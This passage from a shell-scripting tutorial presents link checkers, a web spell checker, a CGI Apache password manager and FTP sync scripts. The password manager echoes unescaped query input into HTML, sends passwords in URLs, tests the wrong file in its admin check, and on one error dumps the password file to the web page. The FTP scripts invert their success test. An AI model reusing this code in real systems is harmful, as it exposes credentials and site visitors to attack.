external URLs (see Script #78, Reporting Broken External Links, for how to exploit this data); traverse.errors
contains a list of failed, invalid links (the gist of this script); traverse.dat contains a list of all pages checked; and
traverse2.dat is identical to traverse.dat except that it also includes the title of every page visited.

Running the Script


To run this script, simply specify a URL on the command line. Because it goes out to the network, you can traverse
and check any website, but beware: Checking something like Google or Yahoo! will take forever and eat up all of your
disk space in the process.

The Results
First off, let's check a tiny website that has no errors:

$ checklinks http://www.ourecopass.org/
No errors encountered. Checked 4 pages at http://www.ourecopass.org/

Sure enough, all is well. How about a slightly larger site?

$ checklinks http://www.clickthrustats.com/
1 errors encountered. Checked 9 pages at http://www.clickthrustats.com/:
contactus.shtml          in privacy.shtml
(A copy of this output has been saved in www.clickthrustats.com.errors)

This means that the file privacy.shtml contains a link to contactus.shtml that cannot be resolved: The file
contactus.shtml does not exist. Finally, let's check my main website to see what link errors might be lurking:
$ date ; checklinks http://www.intuitive.com/ ; date
Tue Sep 16 21:55:39 GMT 2003
6 errors encountered. Checked 728 pages at http://www.intuitive.com/:
library/f8               in library/ArtofWriting.shtml
library/f11              in library/ArtofWriting.shtml
library/f16              in library/ArtofWriting.shtml
library/f18              in library/ArtofWriting.shtml
articles/cookies/        in articles/csi-chat.html
~taylor                  in articles/aol-transcript.html
(A copy of this output has been saved in www.intuitive.com.errors)
Tue Sep 16 22:02:50 GMT 2003

Notice that adding a call to date before and after a long command is a lazy way to see how long the command takes.
Here you can see that checking the 728-page intuitive.com site took just over seven minutes.

Hacking the Script


The grep statement in this script produces a list of all files checked, which can be fed to wc -l to ascertain how
many pages have been examined. The actual errors are found in the traverse.errors file:

echo Checked $(grep '^http' traverse.dat | wc -l) pages at ${1}:
sed "s|$1||g" < traverse.errors

To have this script report on image (img) reference errors instead, grep the traverse.errors file for gif,
jpeg, or png filename suffixes before feeding the result to the sed statement (which just cleans up the output format
to make it attractive).
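A sketch of that change, run against a fabricated traverse.errors file (the sample entries and the exact regular expression are illustrative assumptions, not output from a real traversal):

```shell
# Fabricated sample of lynx traversal error output: two failed links,
# one of which is an image reference
printf 'http://example.org/art/logo.gif\tin index.shtml\n' > traverse.errors
printf 'http://example.org/library/f8\tin library/ArtofWriting.shtml\n' >> traverse.errors

# Keep only image references before handing off to the sed cleanup step
grep -E '\.(gif|jpe?g|png)' traverse.errors
```

Only the logo.gif line survives the filter; the sed substitution from the script would then strip the base URL as before.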

#78 Reporting Broken External Links


This partner script to Script #77, Identifying Broken Internal Links, utilizes the -traversal option of lynx to
generate and test a set of external links (links to other websites). When run as a traversal of a site, lynx produces
a number of data files, one of which is called reject.dat. The reject.dat file contains a list of all external
links, both website links and mailto: links. By iteratively trying to access each http link in reject.dat, you
can quickly ascertain which sites work and which sites fail to resolve, which is exactly what this script does.

The Code
#!/bin/sh

# checkexternal - Traverses all internal URLs on a website to build a
#   list of external references, then checks each one to ascertain
#   which might be dead or otherwise broken. The -a flag forces the
#   script to list all matches, whether they're accessible or not: by
#   default only unreachable links are shown.

lynx="/usr/local/bin/lynx"    # might need to be tweaked
listall=0; errors=0           # shortcut: two vars on one line!

if [ "$1" = "-a" ] ; then
  listall=1; shift
fi

outfile="$(echo "$1" | cut -d/ -f3).external-errors"
/bin/rm -f $outfile           # clean it for new output

trap "/bin/rm -f traverse*.errors reject*.dat traverse*.dat" 0

if [ -z "$1" ] ; then
  echo "Usage: $(basename $0) [-a] URL" >&2
  exit 1
fi

# Create the data files needed
$lynx -traversal $1 > /dev/null ;

if [ -s "reject.dat" ] ; then
  # The following line has a trailing space after the backslash!
  echo -n $(sort -u reject.dat | wc -l) external links encountered
  echo in $(grep '^http' traverse.dat | wc -l) pages
  for URL in $(grep '^http:' reject.dat | sort -u)
  do
    if ! $lynx -dump $URL > /dev/null 2>&1 ; then
      echo "Failed : $URL" >> $outfile
      errors="$(($errors + 1))"
    elif [ $listall -eq 1 ] ; then
      echo "Success: $URL" >> $outfile
    fi
  done
  if [ -s $outfile ] ; then
    cat $outfile
    echo "(A copy of this output has been saved in ${outfile})"
  elif [ $listall -eq 0 -a $errors -eq 0 ] ; then
    echo "No problems encountered."
  fi
else
  echo -n "No external links encountered" ;
  echo in $(grep '^http' traverse.dat | wc -l) pages.
fi
exit 0

How It Works
This is not the most elegant script in this book. It's more of a brute-force method of checking external links, because for
each external link found, the lynx command tests the validity of the link by trying to grab the contents of its URL and
then discarding them as soon as they've arrived, as shown in the following block of code:

if ! $lynx -dump $URL > /dev/null 2>&1 ; then
  echo "Failed : $URL" >> $outfile
  errors="$(($errors + 1))"
elif [ $listall -eq 1 ] ; then
  echo "Success: $URL" >> $outfile
fi

The notation 2>&1 is worth mentioning here: It causes output device #2 to be redirected to whatever output device #1
is set to. With a shell, output #2 is stderr (for error messages) and output #1 is stdout (regular output). Used
alone, 2>&1 will cause stderr to go to stdout. In this instance, however, notice that prior to this redirection,
stdout is already redirected to the so-called bit bucket of /dev/null (a virtual device that can be fed an infinite
amount of data without ever getting any bigger. Think of a black hole, and you'll be on the right track). Therefore, this
notation ensures that stderr is also redirected to /dev/null. We're throwing all of this information away because
all we're really interested in is whether lynx returns a zero or nonzero return code from this command (zero indicates
success; nonzero indicates an error).
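Because redirections are processed left to right, the order matters. A quick experiment, using ls on a nonexistent file as a stand-in for a failing lynx call:

```shell
ls /nonexistent > /dev/null 2>&1   # silent: stderr follows stdout into /dev/null
ls /nonexistent 2>&1 > /dev/null   # error message still appears: stderr was
                                   # duplicated before stdout was redirected
echo $?                            # the nonzero exit status survives either way
```

It's that exit status, not the discarded output, that the script's if statement tests.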
The number of internal pages traversed is calculated by the line count of the file traverse.dat, and the number of
external links is found by looking at reject.dat. If the -a flag is specified, the output lists all external links, whether
they're reachable or not; otherwise only failed URLs are displayed.

Running the Script


To run this script, simply specify the URL of a site to check.

The Results
Let's check a simple site with a known bad link. The -a flag lists all external links, valid or not.

$ checkexternal -a http://www.ourecopass.org/
8 external links encountered in 4 pages
Failed : http://www.badlink/somewhere.html
Success: http://www.ci.boulder.co.us/goboulder/
Success: http://www.ecopass.org/
Success: http://www.intuitive.com/
Success: http://www.ridearrangers.org/
Success: http://www.rtd-denver.com/
Success: http://www.transitalliance.org/
Success: http://www.us36tmo.org/
(A copy of this output has been saved in www.ourecopass.org.external-errors)

To find the bad link, we can easily use the grep command on the set of HTML source files:

$ grep 'badlink/somewhere.html' ~ecopass/*
~ecopass/contact.html: <a href="http://www.badlink/somewhere.html">bad</a>
With a larger site, well, the program can run for a long, long time. The following took three hours to finish testing:

$ date ; checkexternal http://www.intuitive.com/ ; date
Tue Sep 16 23:16:37 GMT 2003
733 external links encountered in 728 pages
Failed : http://chemgod.slip.umd.edu/~kidwell/weather.html
Failed : http://epoch.oreilly.com/shop/cart.asp
Failed : http://ezone.org:1080/ez/
Failed : http://techweb.cmp.com/cw/webcommerce/
Failed : http://tenbrooks11.lanminds.com/
Failed : http://www.builder.cnet.com/
Failed : http://www.buzz.builder.com/
Failed : http://www.chem.emory.edu/html/html.html
Failed : http://www.truste.org/
Failed : http://www.wander-lust.com/
Failed : http://www.websitegarage.com/
(A copy of this output has been saved in www.intuitive.com.external-errors)
Wed Sep 17 02:11:18 GMT 2003

Looks as though it's time for some cleanup work!

#79 Verifying Spelling on Web Pages


This script, webspell, is an amalgamation of ideas presented in earlier scripts, particularly Script #27, Adding a
Local Dictionary to Spell, which demonstrates how to interact with the aspell spelling utility and how to filter its
reported misspellings through your own list of additional acceptable words. It relies on the lynx program to pull all the
text out of the HTML of a page, either local or remote, and then feeds the resultant text to aspell or an equivalent
spelling program.

The Code
#!/bin/sh

# webspell - Uses the spell feature + lynx to spell-check either a
#   web page URL or a file.
# Inevitably you'll find that there are words it flags as wrong but
#   you think are fine. Simply save them in a file, one per line, and
#   ensure that 'okaywords' points to that file.

okaywords="$HOME/bin/.okaywords"
tempout="/tmp/webspell.$$"

trap "/bin/rm -f $tempout" 0

if [ $# -eq 0 ] ; then
  echo "Usage: webspell file|URL" >&2; exit 1
fi

for filename
do
  if [ ! -f "$filename" -a "$(echo $filename|cut -c1-7)" != "http://" ]
  then
    continue    # picked up directory in '*' listing
  fi

  # Adjust the ispell invocation below to produce just a list of misspelled words
  lynx -dump $filename | tr ' ' '\n' | sort -u | \
    grep -vE "(^[^a-z]|')" | \
    ispell -a | awk '/^\&/ { print $2 }' | \
    sort -u > $tempout

  if [ -r $okaywords ] ; then
    # If you have an okaywords file, screen okay words out
    grep -vif $okaywords < $tempout > ${tempout}.2
    mv ${tempout}.2 $tempout
  fi

  if [ -s $tempout ] ; then
    echo "Probable spelling errors: ${filename}"
    cat $tempout | paste - - - - | sed 's/^/  /'
  fi
done
exit 0

How It Works
Using the helpful lynx command, this script extracts just the text from each of the specified pages and then feeds the
result to a spell-checking program (ispell in this example, though it works just as well with aspell or another
spelling program. See Script #25, Checking the Spelling of Individual Words, for more information about different spell-checking options in Unix).
Notice the file existence test in this script too:

if [ ! -f "$filename" -a "$(echo $filename|cut -c1-7)" != "http://" ]

It can't just fail if the given name isn't readable, because $filename might actually be a URL, so the test becomes
rather complex. However, when referencing filenames, the script can work properly with invocations like webspell
*, though you'll get better results with a filename wildcard that matches only HTML files. Try webspell *html
instead.
Whichever spell-checking program you use, you'll need to ensure that the result of the following line is a list only of
misspelled words, with none of the spell-checking utility's special formatting included:

ispell -a | awk '/^\&/ { print $2 }' | \

This spell line is but one part of a quite complex pipeline that extracts the text from the page, translates it to one word
per line (the tr invocation), sorts the words, and ensures that each one appears only once in the pipeline (sort
-u). After the sort operation, we screen out all the lines that don't begin with a lowercase letter (that is, all punctuation,
HTML tags, and other content). Then the next line of the pipe runs the data stream through the spell utility, using
awk to extract the misspelled word from the oddly formatted ispell output. The results are run through a sort -u
invocation, screened against the okaywords list with grep, and formatted for attractive output with paste (which
produces four words per line in this instance).
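The paste invocation is worth seeing in isolation: each `-` consumes one line of standard input per output row, so four dashes fold a one-word-per-line stream into four tab-separated columns (the words here are placeholders):

```shell
printf '%s\n' cafepress microurl signup urlwire webspell |
  paste - - - - | sed 's/^/  /'
# two rows: the first four words, then the leftover word padded
# with empty columns, each row indented two spaces by sed
```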

Running the Script


This script can be given one or more web page URLs or a list of HTML files. To check the spelling of all source files in
the current directory, for example, use *.html as the argument.

The Results
$ webspell http://www.clickthrustats.com/index.shtml *.html
Probable spelling errors: http://www.clickthrustats.com/index.shtml
  cafepress       microurl        signup          urlwire
Probable spelling errors: 074-contactus.html
  webspell        werd

In this case, the script checked a web page on the network from the ClickThruStats.com site and five local
HTML pages, finding the errors shown.

Hacking the Script


It would be a simple change to have webspell invoke the shpell utility presented in Script #26, but it can be
dangerous correcting very short words that might overlap phrases or content of an HTML tag, JavaScript snippet, and
so forth, so some caution is probably in order.
Also worth considering, if you're obsessed with avoiding any misspellings creeping into your website, is this: With a
combination of correcting genuine misspellings and adding valid words to the okaywords file, you can reduce the
output of webspell to nothing and then drop it into a weekly cron job to catch and report misspellings
automatically.
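A hypothetical crontab entry for that weekly job might look like the following (the schedule and paths are assumptions; adjust them for your site):

```
# min hr dom mon dow  command
0 6 * * 1  $HOME/bin/webspell $HOME/public_html/*.html
```

Because cron mails any output of a job to the crontab's owner by default, a clean run (webspell printing nothing) generates no mail, and you hear about it only when a misspelling appears.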

#80 Managing Apache Passwords


One terrific feature of the Apache web server is that it offers built-in support for password-protected directories, even
on a shared public server. It's a great way to have private, secure, and limited-access information on your website,
whether you have a pay subscription service or you just want to ensure that family pictures are viewed only by family.
Standard configurations require that in the password-protected directory you manage a data file called .htaccess,
which specifies the security "zone" name and, most importantly, points to a separate data file, which in turn contains the
account name and password pairs that are used to validate access to the directory. Managing this file is not a problem,
except that the only tool included with Apache for doing so is the primitive htpasswd program, which is run on the
command line. Instead, this script, apm, one of the most complex and sophisticated scripts in this book, offers a
password management tool that runs as a CGI script and lets you easily add new accounts, change the passwords on
existing accounts, and delete accounts from the access list.
To get started, you will need a properly formatted .htaccess file to control access to the directory it's located within.
For demonstration purposes, this file might look like the following:

$ cat .htaccess
AuthUserFile /web/intuitive/wicked/examples/protected/.htpasswd
AuthGroupFile /dev/null
AuthName "Sample Protected Directory"
AuthType Basic

<Limit GET>
require valid-user
</Limit>

A separate file, .htpasswd, contains all the account and password pairs. If this file doesn't yet exist, you'll need to
create one, but a blank one is fine: Use touch .htpasswd and ensure that it's writable by the user ID that runs
Apache itself (probably user nobody). Then we're ready for the script.
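A minimal setup sketch (the nobody account is an assumption; check the User directive in your httpd.conf to see which account your Apache actually runs as):

```shell
touch .htpasswd        # create the empty account/password file
chmod 644 .htpasswd    # the web server must at least be able to read it

# then, as root, hand ownership to the Apache user so CGI scripts
# running as that user can update the file:
#   chown nobody .htpasswd
```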

The Code
#!/bin/sh

# apm - Apache Password Manager. Allows the administrator to easily
#   manage the addition, update, or deletion of accounts and passwords
#   for access to a subdirectory of a typical Apache configuration (where
#   the config file is called .htaccess).

echo "Content-type: text/html"
echo ""
echo "<html><title>Apache Password Manager Utility</title><body>"

myname="$(basename $0)"
temppwfile="/tmp/apm.$$" ; trap "/bin/rm -f $temppwfile" 0
footer="apm-footer.html"
htaccess=".htaccess"      # if you use a /cgi-bin, make sure this points
                          # to the correct .htaccess file!

# Modern versions of 'htpasswd' include a -b flag that lets you specify
#   the password on the command line. If yours can do that, specify it
#   here, with the '-b' flag:
# htpasswd="/usr/local/bin/htpasswd -b"
# Otherwise, there's a simple Perl rewrite of this script that is a good
#   substitute, at http://www.intuitive.com/shellhacks/examples/httpasswd-b.pl

htpasswd="/web/intuitive/wicked/examples/protected/htpasswd-b.pl"

if [ "$REMOTE_USER" != "admin" -a -s $htpasswd ] ; then
  echo "Error: you must be user <b>admin</b> to use APM."
  exit 0
fi

# Now get the password filename from the .htaccess file

if [ ! -r "$htaccess" ] ; then
  echo "Error: cannot read $htaccess file in this directory."
  exit 0
fi

passwdfile="$(grep "AuthUserFile" $htaccess | cut -d\  -f2)"

if [ ! -r $passwdfile ] ; then
  echo "Error: can't read password file: can't make updates."
  exit 0
elif [ ! -w $passwdfile ] ; then
  echo "Error: can't write to password file: can't update."
  exit 0
fi

echo "<center><h2 style='background:#ccf'>Apache Password Manager</h2>"

action="$(echo $QUERY_STRING | cut -c3)"
user="$(echo $QUERY_STRING|cut -d\& -f2|cut -d= -f2|tr '[:upper:]' '[:lower:]')"

case "$action" in
  A ) echo "<h3>Adding New User <u>$user</u></h3>"
      if [ ! -z "$(grep -E "^${user}:" $passwdfile)" ] ; then
        echo "Error: user <b>$user</b> already appears in the file."
      else
        pass="$(echo $QUERY_STRING|cut -d\& -f3|cut -d= -f2)"
        if [ ! -z "$(echo $pass|tr -d '[[:upper:][:lower:][:digit:]]')" ]
        then
          echo "Error: passwords can only contain a-z A-Z 0-9 ($pass)"
        else
          $htpasswd $passwdfile $user $pass
          echo "Added!<br>"
        fi
      fi
      ;;
  U ) echo "<h3>Updating Password for user <u>$user</u></h3>"
      if [ -z "$(grep -E "^${user}:" $passwdfile)" ] ; then
        echo "Error: user <b>$user</b> isn't in the password file?"
        echo "<pre>";cat $passwdfile;echo "</pre>"
        echo "searched for &quot;^${user}:&quot; in $passwdfile"
      else
        pass="$(echo $QUERY_STRING|cut -d\& -f3|cut -d= -f2)"
        if [ ! -z "$(echo $pass|tr -d '[[:upper:][:lower:][:digit:]]')" ]
        then
          echo "Error: passwords can only contain a-z A-Z 0-9 ($pass)"
        else
          grep -vE "^${user}:" $passwdfile > $temppwfile
          mv $temppwfile $passwdfile
          $htpasswd $passwdfile $user $pass
          echo "Updated!<br>"
        fi
      fi
      ;;
  D ) echo "<h3>Deleting User <u>$user</u></h3>"
      if [ -z "$(grep -E "^${user}:" $passwdfile)" ] ; then
        echo "Error: user <b>$user</b> isn't in the password file?"
      elif [ "$user" = "admin" ] ; then
        echo "Error: you can't delete the 'admin' account."
      else
        grep -vE "^${user}:" $passwdfile > $temppwfile
        mv $temppwfile $passwdfile
        echo "Deleted!<br>"
      fi
      ;;
esac

# Always list the current users in the password file...
echo "<br><br><table border='1' cellspacing='0' width='80%' cellpadding='3'>"
echo "<tr bgcolor='#cccccc'><th colspan='3'>List "
echo "of all current users</td></tr>"

oldIFS=$IFS ; IFS=":"     # change word split delimiter

while read acct pw ; do
  echo "<tr><th>$acct</th><td align=center><a href=\"$myname?a=D&u=$acct\">"
  echo "[delete]</a></td></tr>"
done < $passwdfile

echo "</table>"

IFS=$oldIFS               # and restore it

# Build option string with all accounts included
optionstring="$(cut -d: -f1 $passwdfile | sed 's/^/<option>/'|tr '\n' ' ')"

# And output the footer
sed -e "s/--myname--/$myname/g" -e "s/--options--/$optionstring/g" < $footer

exit 0

How It Works
There's a lot working together for this script to function. Not only do you need to have your Apache configuration (or
equivalent) correct, but you need to have the correct entries in the .htaccess file and you need an .htpasswd
file with (ideally) at least an entry for the admin user.
The script itself extracts the htpasswd filename from the .htaccess file and does a variety of tests to sidestep
common htpasswd error situations, including an inability for the script to write to the file. It also checks to ensure
that the user is logged in as admin if the password file exists and is nonzero in size. All of this occurs before the main
block of the script, the case statement.
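That extraction is a one-line grep-and-cut, and it's easy to try in isolation against a sample .htaccess (the path here is purely illustrative):

```shell
# Fabricated .htaccess for demonstration
cat > .htaccess <<'EOF'
AuthUserFile /web/protected/.htpasswd
AuthGroupFile /dev/null
AuthName "Sample Protected Directory"
EOF

# Same logic as the script: grab the second space-delimited field
passwdfile="$(grep "AuthUserFile" .htaccess | cut -d' ' -f2)"
echo "$passwdfile"    # → /web/protected/.htpasswd
```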

Processing Changes to .htpasswd


The case statement ascertains which of three possible actions is requested (A = add a user, U = update a user
record, and D = delete a user) and invokes the correct segment of code accordingly. The action and the user account
on which to perform the action are specified in the QUERY_STRING variable (sent by the web browser to the server)
as a=X&u=Y, where X is the action letter code and Y is the specified username. When a password is being changed
or a user is being added, a third argument, p, is needed and sent to the script.
For example, let's say I was adding a new user called joe, with the password knife. This action would result in the
following QUERY_STRING being given to the script from the web server:

a=A&u=joe&p=knife

The script would unwrap this so that action was A, user was joe, and pass was knife. Then it would ensure
that the password contains only valid alphabetic characters in the following test:

if [ ! -z "$(echo $pass | tr -d '[[:upper:][:lower:][:digit:]]')" ] ; then
  echo "Error: passwords can only contain a-z A-Z 0-9 ($pass)"

Finally, if all was well, it would invoke the htpasswd program to encrypt the password and add the new entry to the
.htpasswd file:

$htpasswd $passwdfile $user $pass
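You can trace the unwrapping with the script's own cut pipelines, run on the sample query string:

```shell
QUERY_STRING='a=A&u=joe&p=knife'

action="$(echo $QUERY_STRING | cut -c3)"                  # third character
user="$(echo $QUERY_STRING | cut -d\& -f2 | cut -d= -f2)" # 2nd &-field, after =
pass="$(echo $QUERY_STRING | cut -d\& -f3 | cut -d= -f2)" # 3rd &-field, after =

echo "$action $user $pass"    # → A joe knife
```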

Listing All User Accounts


In addition to processing requested changes to the .htpasswd file, directly after the case statement this script also
produces an HTML table that lists each user in the .htpasswd file, along with a [delete] link.
After producing three lines of HTML output for the heading of the table, the script continues with the interesting code:

oldIFS=$IFS ; IFS=":"     # change word split delimiter

while read acct pw ; do
  echo "<tr><th>$acct</th><td align=center><a href=\"$myname?a=D&u=$acct\">"
  echo "[delete]</a></td></tr>"
done < $passwdfile

echo "</table>"

IFS=$oldIFS               # and restore it

This while loop reads the name and password pairs from the .htpasswd file through the trick of changing the input
field separator (IFS) to a colon (and changing it back when done).
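The same IFS trick works on any colon-delimited stream; here it is on a couple of made-up account entries:

```shell
oldIFS=$IFS ; IFS=":"
printf 'alice:x9fGh2\nbob:Qr7t1p\n' | while read acct pw ; do
  echo "account=$acct"    # pw silently absorbs the rest of each line
done
IFS=$oldIFS
# prints account=alice, then account=bob
```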

Adding a Footer of Actions to Take


The script also relies on the presence of an HTML file called apm-footer.html that contains quite a bit of code
itself, including occurrences of the strings "--myname--" and "--options--", which are replaced by the current name of
the CGI script and the list of users, respectively, as the file is output to stdout.

sed -e "s/--myname--/$myname/g" -e "s/--options--/$optionstring/g" < $footer

The $myname variable is processed by the CGI engine, which replaces the variable with the actual name of the script.
The script itself builds the $optionstring variable from the account name and password pairs in the
.htpasswd file:

optionstring="$(cut -d: -f1 $passwdfile | sed 's/^/<option>/'|tr '\n' ' ')"

And here's the HTML footer file itself, which provides the ability to add a user, update a user's password, and delete a
user:

<!-- footer information for APM system. -->

<div style='margin-top: 10px;'>
<table border='1' cellpadding='2' cellspacing='0' width="80%">
 <tr><th colspan='4' bgcolor='#cccccc'>Password Manager Actions</th></tr>
 <tr><td>
  <form method="get" action="--myname--">
   <table border='0'>
    <tr><td><input type='hidden' name="a" value="A">
     add user:</td><td><input type='text' name='u' size='10'>
    </td></tr><tr><td>
     password:</td><td><input type='text' name='p' size='10'>
     <input type='submit' value='+'>
    </td></tr>
   </table></form>
 </td><td>
  <form method="get" action="--myname--">
   <table border='0'>
    <tr><td><input type='hidden' name="a" value="U">
     update</td><td><select name='u'>--options--</select>
    </td></tr><tr><td>
     password:</td><td><input type='text' name='p' size='10'>
     <input type='submit' value='@'>
    </td></tr>
   </table></form>
 </td><td>
  <form method="get" action="--myname--"><input type='hidden'
   name="a" value="D">delete <select name='u'>--options--</select>
   <input type='submit' value='-'></form>
 </td><td>
  <form method="get" action="--myname--"><input type='hidden'
   name="a" value="L"><input type='submit' value='list all users'>
  </form>
 </td></tr>
</table>
</div>
</body>
</html>

Running the Script


You'll most likely want to have this script in the same directory you're endeavoring to protect with passwords, although
you can also put it in your cgi-bin directory: Just tweak the htpasswd value at the beginning of the script as
appropriate. You'll also need an .htaccess file defining access permissions and an .htpasswd file that's at least
zero bytes and writable, if nothing else.
Very helpful tip

When you use apm, make sure that the first account you create is admin, so you
can use the script upon subsequent invocations! There's a special test in the code
that allows you to create the admin account if .htpasswd is empty.

The Result
The result of running the apm script is shown in Figure 9-1. Notice in the screen shot that it not only lists all the
accounts, with a delete link for each, but also, in the bottom section, offers options for adding another account,
changing the password of an existing account, deleting an account, or listing all the accounts.

Figure 9-1: A shell-script-based Apache password management system

Hacking the Script


The Apache htpasswd program offers a nice command-line interface for appending the new account and encrypted
password information to the account database, but only one of the two commonly distributed versions of htpasswd
supports batch use for scripts (that is, feeding it both an account and password from the command line). It's easy to tell
whether your version does: If htpasswd doesn't complain when you try to use the -b flag, you've got the good, more
recent version. Otherwise, there's a simple Perl script that offers the same functionality and can be downloaded from
http://www.intuitive.com/wicked/examples/htpasswd-b.html and installed.
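One way to probe for -b support from a script is sketched below. This is a hedged example: htpasswd may not be installed at all, and it assumes the -n flag (print the result to stdout instead of updating a file) is available in the same versions that support -b:

```shell
#!/bin/sh
# Probe whether the local htpasswd supports batch (-b) mode.
# Assumption: -n (write to stdout, no file) exists alongside -b.
if ! command -v htpasswd >/dev/null 2>&1 ; then
  echo "htpasswd: not installed"
elif htpasswd -nb testuser testpass >/dev/null 2>&1 ; then
  echo "htpasswd: batch (-b) mode supported"
else
  echo "htpasswd: batch (-b) mode NOT supported"
fi
```

A check like this could guard the $htpasswd invocation in apm, falling back to the Perl replacement when batch mode is absent.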

#81 Synchronizing Directories with FTP


One of my most common uses for ftp is to ensure that a local copy of a directory is synchronized with a remote copy
on a web server. The fancy name for this is content mirroring. The basic idea is simple: Move into a specific local
directory, specify a remote server and remote directory, and then ensure that anything that's changed in one directory
is copied to the other, as needed.
This book offers two scripts for FTP syncing: ftpsyncup and ftpsyncdown. The first uploads all files in the
current directory to the remote directory, while the latter does the opposite and is presented next, as Script #82. Unless
you're starting afresh on a new client system and thus need to acquire the latest versions of files from a server, you'll
most likely use ftpsyncup far, far more often than its sibling, because people rarely work directly on files located on
servers.

The Code
#!/bin/sh

# ftpsyncup - Given a target directory on an ftp server, make sure that
#    all new or modified files are uploaded to the remote system. Uses
#    a timestamp file ingeniously called .timestamp to keep track.

timestamp=".timestamp"
tempfile="/tmp/ftpsyncup.$$"
count=0

trap "/bin/rm -f $tempfile" 0 1 15     # zap tempfile on exit & sigs

if [ $# -eq 0 ] ; then
  echo "Usage: $0 user@host { remotedir }" >&2
  exit 1
fi

user="$(echo $1 | cut -d@ -f1)"
server="$(echo $1 | cut -d@ -f2)"

echo "open $server" > $tempfile
echo "user $user" >> $tempfile

if [ $# -gt 1 ] ; then
  echo "cd $2" >> $tempfile
fi

if [ ! -f $timestamp ] ; then
  # no timestamp file, upload all files
  for filename in *
  do
    if [ -f "$filename" ] ; then
      echo "put \"$filename\"" >> $tempfile
      count=$(($count + 1))
    fi
  done
else
  for filename in $(find . -newer $timestamp -type f -print)
  do
    echo "put \"$filename\"" >> $tempfile
    count=$(($count + 1))
  done
fi

if [ $count -eq 0 ] ; then
  echo "$0: No files require uploading to $server" >&2
  exit 0
fi

echo "quit" >> $tempfile

echo "Synchronizing: Found $count files in local folder to upload."

if ! ftp -n < $tempfile ; then
  echo "Done. All files synchronized up with $server"
  touch $timestamp
fi

exit 0

How It Works
The ftpsyncup script uses the .timestamp file to ascertain which files in the current directory have changed
since the last time ftpsyncup synchronized with the remote system. If .timestamp isn't present, ftpsyncup
automatically uploads everything in the current directory.
The actual upload of files occurs in the conditional statement at the end of the script, which tests to see whether the
transfer worked:
if ! ftp -n < $tempfile ; then
Caution   Be warned that some versions of Unix include an ftp program that doesn't properly return a nonzero
          failure code to the shell when a transfer fails. If you have such an ftp program, the conditional
          statement just shown will always return false, and the touch $timestamp statement will never
          execute. If you find that to be the case, remove the conditional block completely, leaving just the
          following:
ftp -n < $tempfile
touch $timestamp
Upon completion, the .timestamp file is either created or updated, depending on whether it exists.
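The incremental-upload half of the script hinges on find -newer. Here's a minimal, self-contained demonstration using explicitly backdated files in a scratch directory (the filenames are invented):

```shell
#!/bin/sh
# Demonstrate find -newer with explicitly backdated files.
dir=$(mktemp -d)
cd "$dir" || exit 1

touch -t 202001010000 old.txt        # modified before the marker
touch -t 202001020000 .timestamp     # the sync marker
touch -t 202001030000 new.txt        # modified after the marker

# Only new.txt is newer than .timestamp, so only it would be re-uploaded.
find . -newer .timestamp -type f -print

cd / && rm -rf "$dir"
```

The find invocation prints only ./new.txt, which is exactly why touching .timestamp after a successful transfer resets the "what's changed" baseline.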

Running the Script


To run this script, set up a directory on the remote server that you want to have mirror the contents of a local directory
using ftp, and then synchronize the files in the current directory by invoking ftpsyncup with the account name,
server name, and remote directory.
It would be quite easy to either drop this shell invocation directly into a cron job or to create a sync alias that
remembers the command-line arguments, as shown in the "Running the Script" section of Script #83, Synchronizing
Files with SFTP.

The Results
$ ftpsyncup taylor@intuitive.com archive
Synchronizing Up: Found 33 files in local sync folder.
Password:
Done. All files synchronized up with intuitive.com
The Password: prompt is from within the ftp program itself, and on this Linux system, the entire interaction is
quite succinct and graceful. The second time the command is invoked, it properly reports nothing to do:
$ ftpsyncup taylor@intuitive.com archive
ftpsyncup: No files require uploading to intuitive.com

Hacking the Script


The ftpsyncup script uploads only files, ignoring directories. To rectify this, you could have each subdirectory within
the working directory on the local system detected in the for filename in loop, add a mkdir command to the
$tempfile file, and then invoke another call to ftpsyncup with the name of the new remote subdirectory at the
end of the current script. You'd still need to ensure that you aren't irreversibly stepping into subdirectories, but that can
be managed by invoking subsequent calls to ftpsyncup in subshells.
The problem with this solution is that it's really beginning to push the edges of what's logical to include in a shell script.
If you have ncftp, for example, you'll find that it has built-in support for recursive put commands; rewriting these
scripts to utilize that ncftp capability makes a lot more sense than continuing to struggle with the more primitive ftp
command.
When to rewrite your script in a "real" programming language

Any shell script that's grown to more than 150 lines or so would probably be better written in a more
sophisticated language, whether Perl, C, C++, or even Java. The longest script in this entire book is only
149 lines long (Script #53, Validating User crontab Entries). Your cutoff may vary, and there are some
situations in which you must solve the problem within a shell script, but they're few and far between.
Think carefully about whether you can solve the problem more efficiently in a more sophisticated
development environment if you find your script is bursting at the seams and hundreds of lines long.

#82 Synchronizing to a Remote Directory via FTP


This is the partner to Script #81, ftpsyncup, and it proves to be quite a bit simpler. It utilizes the ftp mget
command to automatically retrieve the contents of all files in the remote directory, copying them one by one to the local
system.

The Code
#!/bin/sh

# ftpsyncdown - Given a source directory on a remote FTP server,
#    downloads all the files therein into the current directory.

tempfile="/tmp/ftpsyncdown.$$"

trap "/bin/rm -f $tempfile" 0 1 15     # zap tempfile on exit

if [ $# -eq 0 ] ; then
  echo "Usage: $0 user@host { remotedir }" >&2
  exit 1
fi

user="$(echo $1 | cut -d@ -f1)"
server="$(echo $1 | cut -d@ -f2)"

echo "open $server" > $tempfile
echo "user $user" >> $tempfile

if [ $# -gt 1 ] ; then
  echo "cd $2" >> $tempfile
fi

cat << EOF >> $tempfile
prompt
mget *
quit
EOF

echo "Synchronizing: Downloading files"

if ! ftp -n < $tempfile ; then
  echo "Done. All files on $server downloaded to $(pwd)"
fi

exit 0

How It Works
This script works almost identically to Script #81, Synchronizing Directories with FTP, and you'll find that the helpful
"How It Works" description there also applies directly to this script. As with Script #81, if you have a version of ftp
that doesn't properly return a nonzero failure code to the shell when a transfer fails, simply remove the conditional
block completely, leaving only
ftp -n < $tempfile

Running the Script


This script is invoked with the account name and server name of the remote system and an optional remote directory
name that's the target from which to copy files. The current working directory on the local system receives whatever is
copied.

The Results
Copying the contents of the remote archive directory to a new server is a breeze:
$ ftpsyncdown taylor@intuitive.com archive
Synchronizing: Downloading files
Password:
Interactive mode off.
Done. All files on intuitive.com downloaded to /home/joe/archive

Hacking the Script


Like its partner script, ftpsyncup, ftpsyncdown doesn't deal with transferring directories in a graceful manner.
It will stumble and output an error message for each subdirectory encountered in the remote directory.
Solving this problem is tricky because it's difficult to ascertain the directory and file structure on the remote ftp server.
One possible solution would be to have the script execute a dir command on the remote directory, step through the
output results to ascertain which of the remote matches is a file and which is a subdirectory, download all the files to
the current local directory, make any necessary subdirectories within the local directory, and then, one by one, step into
